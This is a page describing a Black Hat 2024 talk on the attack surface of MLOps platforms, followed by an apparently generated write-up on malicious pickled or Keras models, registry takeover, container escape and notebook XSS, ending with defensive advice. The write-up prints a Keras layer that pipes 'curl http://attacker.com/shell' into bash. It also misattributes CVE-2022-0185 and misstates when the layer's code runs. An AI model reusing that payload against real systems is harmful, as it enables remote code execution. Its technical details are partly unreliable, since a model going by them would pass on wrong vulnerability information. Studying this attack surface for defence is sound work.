Black Hat2024

From MLOps to MLOops: Exposing the Attack Surface of Machine Learning Platforms

Black Hat1,353 views38:00about 1 year ago

This talk demonstrates how vulnerabilities in MLOps platforms, such as lack of authentication and insecure model serialization, can be chained to achieve remote code execution and container escapes. The research focuses on the attack surface of popular machine learning infrastructure, including model registries, pipelines, and inference servers. The speaker highlights that models themselves are executable code, making them a critical vector for supply chain attacks. The presentation concludes with practical mitigation strategies, including the use of safe model formats and security plugins for development environments.

Why Your MLOps Pipeline Is Just a Remote Code Execution Engine in Disguise

TLDR: Machine learning platforms like MLflow and Seldon Core are being deployed with dangerous defaults that treat model files as executable code. By chaining insecure deserialization, lack of authentication, and container escapes, researchers have demonstrated that compromising a single model registry can lead to full infrastructure takeover. Security teams must treat model files as untrusted binaries and enforce strict isolation for all inference and training workloads.

Machine learning infrastructure is currently in the same state that web application security was in twenty years ago. Developers are rushing to deploy complex MLOps platforms to manage the lifecycle of models, but they are treating these platforms as black boxes that only handle data. The reality is far more dangerous. Models are not just static blobs of weights and biases. In many common formats, they are serialized objects that execute arbitrary code upon deserialization. When you load a model, you are often running a remote payload provided by an attacker.

The Inherent Danger of Model Serialization

The core issue is that many popular machine learning frameworks rely on serialization libraries that were never designed for security. The most notorious offender is Python’s pickle module. When a platform uses pickle or libraries that wrap it, such as jsonpickle (referenced in CVE-2020-22083), the act of loading a model is functionally equivalent to executing a script.

Attackers do not need to find a complex memory corruption bug to gain a foothold. They simply need to craft a malicious model file that, when loaded by a victim’s inference server or a data scientist’s notebook, executes a reverse shell or exfiltrates environment variables. Because these platforms often lack robust authentication, an attacker who gains access to a model registry can replace legitimate models with backdoored versions. The next time a CI/CD pipeline or a production server pulls the "latest" model, the compromise spreads automatically.

Chaining Vulnerabilities for Infrastructure Takeover

The most effective attacks against MLOps platforms do not rely on a single bug. They chain multiple weaknesses to move from a low-privilege access point to full cluster control. A common attack flow starts with a path traversal vulnerability, such as the one identified in CVE-2022-0185, which can be used to leak sensitive configuration files or API keys from the underlying host.

Once an attacker has obtained administrative API keys for a platform like Weights & Biases, they can manipulate the model registry. The next step is to upload a malicious model that triggers a container escape. If the inference server is running with excessive privileges or lacks proper seccomp profiles, the attacker can break out of the container and gain access to the host node.

Consider this simplified payload structure used to demonstrate code execution within a model:

import os
import tensorflow as tf

class MaliciousLayer(tf.keras.layers.Layer):
    def call(self, x):
        os.system("curl http://attacker.com/shell | bash")
        return x

model = tf.keras.models.Sequential([
    MaliciousLayer(),
    tf.keras.layers.Dense(10)
])
model.save("backdoored_model.h5")

When this model is loaded by a standard inference server, the call method executes the system command. For a pentester, this means that any endpoint accepting a model file upload is a high-priority target. If you are auditing an MLOps environment, your first step should be to verify if the platform supports "remote code execution as a feature." Many do, and they often document it as a way to run custom pre-processing logic.

The Jupyter Notebook Trap

Data scientists frequently use Jupyter Notebooks for interactive model development. These environments are often poorly isolated. A recent vulnerability, CVE-2024-27132, highlighted how insufficient sanitization in MLflow recipes could lead to Cross-Site Scripting (XSS). In the context of a Jupyter environment, XSS is not just a way to steal a session cookie. It is a direct path to Remote Code Execution.

An attacker can inject JavaScript into a notebook output that, when rendered by the browser, uses the Jupyter API to create a new code cell and execute arbitrary Python commands on the server. This effectively turns the data scientist’s browser into an attack vector against the internal network. If you are testing an organization that uses Jupyter for ML, treat the notebook server as a critical internal asset. If you can execute code in a notebook, you have effectively compromised the data scientist’s credentials and their access to the model registry.

Defensive Strategies for MLOps

Defending these platforms requires a shift in mindset. You cannot rely on the platform’s built-in security features, as many are either non-existent or misconfigured. First, implement strict network segmentation. Inference servers should never have direct access to the internet or to the internal management APIs of the model registry.

Second, move away from dangerous serialization formats. If your team is using pickle or joblib, push for a migration to safer, data-only formats like Safetensors. These formats are designed to store tensors without executing code. If you must use legacy formats, implement a scanning layer. Tools like pickle-scan can help identify suspicious opcodes in serialized files before they are loaded into your production environment.

Finally, if you are using Jupyter, install security extensions like XSSGuard to sandbox the output of notebook cells. This prevents malicious JavaScript from interacting with the DOM and escalating to code execution. MLOps is a high-value target because it sits at the intersection of data, code, and production infrastructure. Treat it with the same level of scrutiny you would apply to a domain controller or a CI/CD build server. The next major supply chain attack will likely originate from a backdoored model, not a compromised dependency.

Talk Type

research presentation

Difficulty

advanced